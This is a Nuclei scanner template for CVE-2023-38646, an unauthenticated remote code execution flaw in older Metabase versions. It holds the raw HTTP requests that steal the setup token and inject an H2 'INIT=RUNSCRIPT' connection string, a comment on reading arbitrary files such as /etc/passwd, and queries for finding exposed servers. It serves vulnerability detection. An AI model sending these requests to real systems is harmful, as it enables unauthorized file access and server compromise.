nuclei-templates/http/cves/2023/CVE-2023-38646.yaml

id: CVE-2023-38646

info:
  name: Metabase < 0.46.6.1 - Remote Code Execution
  author: rootxharsh,iamnoooob,pdresearch
  severity: critical
  description: |
    Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.    
  reference:
    - https://www.metabase.com/blog/security-advisory
    - https://github.com/metabase/metabase/releases/tag/v0.46.6.1
    - https://mp.weixin.qq.com/s/ATFwFl-D8k9QfQfzKjZFDg
    - https://news.ycombinator.com/item?id=36812256
    - https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
    - https://gist.github.com/testanull/a7beb2777bbf550f3cf533d2794477fe
  classification:
    cve-id: CVE-2023-38646
    epss-score: 0.00048
  metadata:
    shodan-query: http.title:"Metabase"
    fofa-query: app="Metabase"
    verified: true
    max-request: 2
  tags: cve,cve2023,metabase,oss,rce

variables:
  file: "./plugins/vertica.metabase-driver.jar" # overwrite file var via cli option to read arbitrary file (-var file="file:///etc/passwd")

http:
  - raw:
      - |
        GET /api/session/properties HTTP/1.1
        Host: {{Hostname}}        

      - |
        POST /api/setup/validate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "token":"{{token}}",
           "details":{
              "details":{
                 "subprotocol":"h2",
                 "classname":"org.h2.Driver",
                 "advanced-options":true,
                 "subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\;"
              },
              "name":"{{randstr}}",
              "engine":"postgres"
           }
        }        

    extractors:
      - type: json
        part: body_1
        name: token
        json:
          - .["setup-token"]
        internal: true

    matchers:
      - type: dsl
        dsl:
          - contains_any(body_2, "Syntax error in SQL statement","NoSuchFileException")
          - status_code_2 == 400
        condition: and